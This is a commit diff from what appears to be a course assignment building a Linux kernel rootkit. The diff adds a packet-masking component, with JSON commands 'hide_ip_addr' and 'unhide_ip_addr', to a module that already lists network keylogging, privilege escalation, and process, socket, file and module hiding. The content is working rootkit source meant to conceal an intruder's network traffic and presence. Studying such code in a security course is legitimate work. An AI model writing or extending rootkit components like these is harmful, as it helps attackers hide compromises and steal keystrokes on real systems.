Integrated and tested the packet masker

Author: Mondobot

Assignment_8/rootkit/Makefile

@@ -28,9 +28,8 @@ KDIR = /lib/modules/$(shell uname -r)/build
 TARGET = rootkit
 
 obj-m += $(TARGET).o
-rootkit-objs := module_masking.o network_keylogging.o privil_escalation.o process_masking.o socket_masking.o conf_manager.o jsmn.o udp_server.o file_masking.o core.o
+rootkit-objs := module_masking.o network_keylogging.o privil_escalation.o process_masking.o socket_masking.o conf_manager.o jsmn.o udp_server.o file_masking.o core.o packet_masking.o
 ccflags-y = -Wno-unused-function
-#file_masking.o
 
 all:	sysmap
 	make -C $(KDIR) M=$(PWD) modules

Assignment_8/rootkit/conf_manager.c

@@ -28,7 +28,7 @@
 #include "process_masking.h"	/* Needed for ... */
 #include "socket_masking.h"		/* Needed for ... */
 #include "file_masking.h"
-
+#include "packet_masking.h"
 
 /*******************************************************************************/
 /*                                                                             */
@@ -246,6 +246,22 @@ static int parse_json(char *json_str)
 				unmask_socket("udp6", port);
 			}
 
+		} else if (!jsoneq(json_str, &t[i], "hide_ip_addr")) {
+			count = extract_array_values(json_str);
+			printk(KERN_INFO "%s: %d\n", "hiding_address", count);
+			for (j=0 ; j<count ; j++) {
+				printk(KERN_INFO "index %d has value %s\n", j, values[j]);
+				mask_ip_traffic(values[j]);
+			}
+
+		} else if (!jsoneq(json_str, &t[i], "unhide_ip_addr")) {
+			count = extract_array_values(json_str);
+			printk(KERN_INFO "%s: %d\n", "unhide_ip_addr", count);
+			for (j=0 ; j<count ; j++) {
+				printk(KERN_INFO "index %d has value %s\n", j, values[j]);
+				unmask_ip_traffic(values[j]);
+			}
+
 		} else {
 			printk(KERN_INFO "Unexpected key: %.*s\n", t[i].end-t[i].start,
 					json_str + t[i].start);

Assignment_8/rootkit/core.c

@@ -35,6 +35,7 @@
 #include "conf_manager.h"		/* Needed for ... */
 #include "udp_server.h"			/* Needed for ... */
 #include "file_masking.h"
+#include "packet_masking.h"
 #include "core.h"
 
 
@@ -121,6 +122,7 @@ static int __init core_start(void)
 	conf_manager_init(DEBUG_MODE_IS_ON);
 	udp_server_init(DEBUG_MODE_IS_ON);
 	file_masking_init(DEBUG_MODE_IS_ON, (void *)original_readlinkat_syscall);
+	packet_masking_init();
 
 	DEBUG_PRINT("successfully inserted");
 
@@ -151,6 +153,7 @@ static void __exit core_end(void)
 	network_keylogging_exit();
 	//module_masking_exit();
 	file_masking_exit();
+	packet_masking_exit();
 
 	DEBUG_PRINT("successfully removed");